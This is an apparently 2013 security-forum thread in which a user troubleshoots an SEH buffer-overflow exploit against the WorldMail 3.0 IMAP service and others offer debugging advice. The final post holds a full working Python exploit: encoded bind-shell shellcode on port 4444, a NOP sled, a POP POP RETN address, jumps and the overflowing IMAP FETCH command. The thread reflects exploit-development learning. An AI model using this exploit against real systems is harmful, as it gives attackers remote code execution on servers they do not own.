.

Shellcode Executes but Cannot Connect to the victim !

<<

zaixer

User avatar

Newbie
Newbie

Posts: 9

Joined: Thu Jun 13, 2013 12:33 pm

Post Fri Jun 28, 2013 9:34 pm

Shellcode Executes but Cannot Connect to the victim !

Hi all,

I am trying to exploit an SEH bof on "Eudora Qualcomm WorldMail 3.0 (IMAPd)". the shellcode is bind_tcp on port 4444. Everything works fine, I removed all bad characters, verified that the code is placed in the right offset, and the code executes and I verify this by running "netstat -noa" on the victim machine which shows that its listening to port 4444 as expected.
The problem arise when I am trying to connect to this port using netcat. once I connect to the victim, the program crashes in the debugger although it was "Running" without problems just before I connect to it.

I even tried connecting to it from the victim machine itself to keep off any network problem, however, the same problem happen !

Thanks in advance !
<<

hanyhasan

User avatar

Newbie
Newbie

Posts: 17

Joined: Fri May 17, 2013 12:09 pm

Post Sat Jun 29, 2013 3:33 am

Re: Shellcode Executes but Cannot Connect to the victim !

Hi

check this write up about worldmail 3.0
http://www.bnxnet.com/2012/10/01/seh-worldmail-example/
<<

zaixer

User avatar

Newbie
Newbie

Posts: 9

Joined: Thu Jun 13, 2013 12:33 pm

Post Sat Jun 29, 2013 12:48 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Thanks Hany,

Actually I have already reviewed it, however, I doubt that it is working one as the shellcode used contains bad chars like \x00 !
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sat Jun 29, 2013 1:39 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Can you paste your exploit? It's difficult to provide much guidance without seeing it.

Try doing a stack adjustment by subtracting something like -1500 from ESP before your shellcode. I've had the shellcode get corrupted as it decodes. It might get far enough to open a socket, but the rest is broken.
The day you stop learning is the day you start becoming obsolete.
<<

the_hutch

User avatar

Newbie
Newbie

Posts: 9

Joined: Mon Jul 01, 2013 2:05 pm

Post Mon Jul 01, 2013 2:48 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Don't know why people are asking for exploit code on this one. OP obviously has a working exploit if the payload was executed (as evidenced by the open port 4444). The problem is somewhere in the post-exploitation connection attempt.
The only thing I can think of is possibly a firewall sitting between you and the remote system that is white-listed (so drops all incoming connections to ports that are not in standard use on the network). Or a hardened host-based firewall, if target is windows system.
Justin Hutchens
OSCP, CISSP, CNDA, CEH, ECSA, CHFI
http://www.linkedin.com/in/justinhutchens
Kali Linux - Backtrack Evolved
http://www.packtpub.com/kali-linux-back ... ting/video
<<

superkojiman

User avatar

Jr. Member
Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Mon Jul 01, 2013 4:13 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Easy way to check if it's something else blocking the exploit - setup a netcat listener on port 4444 on your victim machine. Then try connecting to it with netcat on your attacking machine. If it gets dropped, then there's something sitting in between preventing it from connecting.

If that works, then you need to examine the debugger closer. Do you know what's causing it to crash? Maybe one of the functions being called when you attempt to connect is returning an error?
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Mon Jul 01, 2013 4:20 pm

Re: Shellcode Executes but Cannot Connect to the victim !

@the_hutch

I think you over-read the intent, in dynamik's response.

(Note, the OP said the listener crashed on a connection attempt. Not that it just didn't respond)

The reason dynamik asked is because, very obviously, while the exploit opened the listener, it has issues with what to do with a connection attempt. I don't think he's actually asking for the code, specific to the exploit, itself, but rather the payload portion of the exploit, where the execution occurs 'POST' exploit. Obviously, either a.) the payload is flawed, or b.) something corrupted the payload, in memory (or it didn't fit in memory), to the point where anything connecting to the listener causes it to crash, or c.) the payload code is making a call to a bad address.

And I also agree with superkojiman, who posted, as I was typing... ;)
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

the_hutch

User avatar

Newbie
Newbie

Posts: 9

Joined: Mon Jul 01, 2013 2:05 pm

Post Mon Jul 01, 2013 6:09 pm

Re: Shellcode Executes but Cannot Connect to the victim !

You're right...my bad. Jumped the gun on that one...
Justin Hutchens
OSCP, CISSP, CNDA, CEH, ECSA, CHFI
http://www.linkedin.com/in/justinhutchens
Kali Linux - Backtrack Evolved
http://www.packtpub.com/kali-linux-back ... ting/video
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Tue Jul 02, 2013 7:53 am

Re: Shellcode Executes but Cannot Connect to the victim !

the_hutch wrote:You're right...my bad. Jumped the gun on that one...


No worries. I do it from time to time, too. (Much more often than I'd like to admit, sometimes.) It helps that many of us here have known dynamik (aka - ajohnson) for a couple of years now, so I pretty much knew where he was coming from (as well as recently having the privilege to meet him, face to face, for the first time - great guy)
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

the_hutch

User avatar

Newbie
Newbie

Posts: 9

Joined: Mon Jul 01, 2013 2:05 pm

Post Tue Jul 02, 2013 8:58 am

Re: Shellcode Executes but Cannot Connect to the victim !

Yeah....as the new guy around here, I should probably at least read the entire post before firing back replies and stepping on peoples toes, lol.
Justin Hutchens
OSCP, CISSP, CNDA, CEH, ECSA, CHFI
http://www.linkedin.com/in/justinhutchens
Kali Linux - Backtrack Evolved
http://www.packtpub.com/kali-linux-back ... ting/video
<<

zaixer

User avatar

Newbie
Newbie

Posts: 9

Joined: Thu Jun 13, 2013 12:33 pm

Post Tue Jul 02, 2013 10:54 am

Re: Shellcode Executes but Cannot Connect to the victim !

@dynamik thanks for your response. For some reason it worked after adding some NOPs after the shellcode ! please check the code below:


====================================================================================================================
shellcode = ("\xb8\x3b\xe5\xd0\x36\xda\xd3\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x34\x07\x25\xca\xa2\x4e"
"\xc6\x33\x32\x31\x4e\xd6\x03\x63\x34\x92\x31\xb3\x3e\xf6\xb9"
"\x38\x12\xe3\x4a\x4c\xbb\x04\xfb\xfb\x9d\x2b\xfc\xcd\x21\xe7"
"\x3e\x4f\xde\xfa\x12\xaf\xdf\x34\x67\xae\x18\x28\x87\xe2\xf1"
"\x26\x35\x13\x75\x7a\x85\x12\x59\xf0\xb5\x6c\xdc\xc7\x41\xc7"
"\xdf\x17\xf9\x5c\x97\x8f\x72\x3a\x08\xb1\x57\x58\x74\xf8\xdc"
"\xab\x0e\xfb\x34\xe2\xef\xcd\x78\xa9\xd1\xe1\x75\xb3\x16\xc5"
"\x65\xc6\x6c\x35\x18\xd1\xb6\x47\xc6\x54\x2b\xef\x8d\xcf\x8f"
"\x11\x42\x89\x44\x1d\x2f\xdd\x03\x02\xae\x32\x38\x3e\x3b\xb5"
"\xef\xb6\x7f\x92\x2b\x92\x24\xbb\x6a\x7e\x8b\xc4\x6d\x26\x74"
"\x61\xe5\xc5\x61\x13\xa4\x81\x46\x2e\x57\x52\xc0\x39\x24\x60"
"\x4f\x92\xa2\xc8\x18\x3c\x34\x2e\x33\xf8\xaa\xd1\xbb\xf9\xe3"
"\x15\xef\xa9\x9b\xbc\x8f\x21\x5c\x40\x5a\xe5\x0c\xee\x34\x46"
"\xfd\x4e\xe4\x2e\x17\x41\xdb\x4f\x18\x8b\x6a\x48\xd6\xef\x3f"
"\x3f\x1b\x10\xae\xe3\x92\xf6\xba\x0b\xf3\xa1\x52\xee\x20\x7a"
"\xc5\x11\x03\xd6\x5e\x86\x1b\x30\x58\xa9\x9b\x16\xcb\x06\x33"
"\xf1\x9f\x44\x80\xe0\xa0\x40\xa0\x6b\x99\x03\x3a\x02\x68\xb5"
"\x3b\x0f\x1a\x56\xa9\xd4\xda\x11\xd2\x42\x8d\x76\x24\x9b\x5b"
"\x6b\x1f\x35\x79\x76\xf9\x7e\x39\xad\x3a\x80\xc0\x20\x06\xa6"
"\xd2\xfc\x87\xe2\x86\x50\xde\xbc\x70\x17\x88\x0e\x2a\xc1\x67"
"\xd9\xba\x94\x4b\xda\xbc\x98\x81\xac\x20\x28\x7c\xe9\x5f\x85"
"\xe8\xfd\x18\xfb\x88\x02\xf3\xbf\xb7\xf3\xc9\x55\x2f\xaa\xb8"
"\x17\x2d\x4d\x17\x5b\x48\xce\x9d\x24\xaf\xce\xd4\x21\xeb\x48"
"\x05\x58\x64\x3d\x29\xcf\x85\x14")


buffer = "\x90" * 300 #Nop Sled to fill the first 300 bytes before the shellcode
buffer += shellcode #Shellcode to spawn a shell listening on port 4444
buffer += "\x90" *81 #Nop Sled to fill the rest of the buffer after the shellcode
buffer += "\xEB\x06\x90\x90" #Short JMP of 6 bytes
buffer += "\x95\xcb\x0d\x60" #Memory Address of POP POP RETN sequence at module MsccMgr.dll
buffer += "\x90"*8+"\xe9\xff\xfc\xff\xff" #8 Bytes of NOPs followed by 700 Bytes backward jump
buffer += "}" *50 #Junk



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
s.connect((sys.argv[1],int(sys.argv[2])))
except:
print "Can\'t connect to server!\n"
sys.exit(0)



print "[+] Connecting to victim !"
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A013 UID FETCH 4827313:4827313 '+ buffer + "\r\n")
s.close()
print "[+] Exploitation Successful\n"
print "[+] Please Connect to port 4444 on victim IP now !\n"
==================================================================================================================
So when moving the 81 NOPs that are after the shellcode and placing them before the shellcode (adding them to the 300 NOPs already there), the exploit fails !

Actually I would appreciate letting me know what is know by stack adjustment !

@superkojiman I am connecting to it from local machine itself: nc 127.0.0.1 444 to avoid any network problems

Return to Programming

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software